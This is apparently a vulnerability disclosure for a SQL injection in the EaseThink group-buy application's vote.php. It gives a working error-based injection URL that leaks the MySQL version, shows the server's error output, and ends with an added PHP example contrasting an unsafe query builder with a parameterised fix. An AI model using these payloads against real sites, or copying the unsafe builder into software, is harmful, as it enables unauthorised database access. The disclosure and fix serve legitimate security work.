EaseThink Group-Buy SQL Injection Vulnerability

The application records a cookie, so clear the cookie after each request.

http://demo.easethink测试数据/vote.php?act=dovote&name[a%27][111]=aa

MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => select * from t_vote_result where name = 'aa' and vote_id = 0 and vote_ask_id = a\' ) [2] => Array ( [error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 ) [3] => Array ( [errno] => 1064 ) )

The error report shows that the key of the name[] array is escaped but placed unquoted into the vote_ask_id condition. This can be exploited directly with error-based injection.

Proof of vulnerability:

http://demo.easethink测试数据/vote.php?act=dovote&name[1 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)%23][111]=aa

MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => select * from t_vote_result where name = 'aa' and vote_id = 0 and vote_ask_id = 1 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)# ) [2] => Array ( [error] => Duplicate entry '|5.1.48|1' for key 'group_key' ) [3] => Array ( [errno] => 1062 ) )

Fix: You know what to do!

Author: kobin97@WooYun
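One way to close the hole, shown as an added example that is not EaseThink's code and not from the original author: the source of vote.php is not on the page, so `build_vulnerable` and `build_hardened` are hypothetical functions reconstructed from the SQL in the error report, and the second and third sample requests are constructed.

```php
<?php
// Added example. vote.php's source is not on the page; both builders are
// hypothetical, reconstructed from the SQL in the error report.
// PHP parses ?name[KEY][111]=aa into ['KEY' => [111 => 'aa']].

function build_vulnerable(array $name, int $voteId): array
{
    $out = [];
    foreach ($name as $askId => $answers) {
        foreach ((array)$answers as $answer) {
            // addslashes() only helps inside quotes; the key lands unquoted.
            $out[] = "select * from t_vote_result where name = '"
                . addslashes((string)$answer) . "' and vote_id = " . $voteId
                . " and vote_ask_id = " . addslashes((string)$askId);
        }
    }
    return $out;
}

function build_hardened(array $name, int $voteId): array
{
    $sql = 'select * from t_vote_result where name = ? and vote_id = ? and vote_ask_id = ?';
    $out = [];
    foreach ($name as $askId => $answers) {
        // Array keys are request data: accept only decimal integers.
        if (!ctype_digit((string)$askId) || !is_array($answers)) {
            continue;
        }
        foreach ($answers as $answer) {
            if (is_string($answer)) {
                // Statement text is constant; values travel as bound parameters.
                $out[] = ['sql' => $sql, 'params' => [$answer, $voteId, (int)$askId]];
            }
        }
    }
    return $out;
}

$requests = [
    'act=dovote&name[a%27][111]=aa',         // first request on the page
    'act=dovote&name[1%20or%201][111]=aa',   // constructed: key with no quote
    'act=dovote&name[7][111]=aa',            // constructed: legitimate vote
];
foreach ($requests as $qs) {
    parse_str($qs, $get);
    echo "vulnerable: ", implode("\n", build_vulnerable($get['name'], 0)), "\n";
    echo "hardened:   ", json_encode(build_hardened($get['name'], 0)), "\n\n";
}
```

The `sql`/`params` pairs are meant to be passed to a prepared statement (for example PDO's `prepare()` and `execute()`), so no request data is ever concatenated into the statement text.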
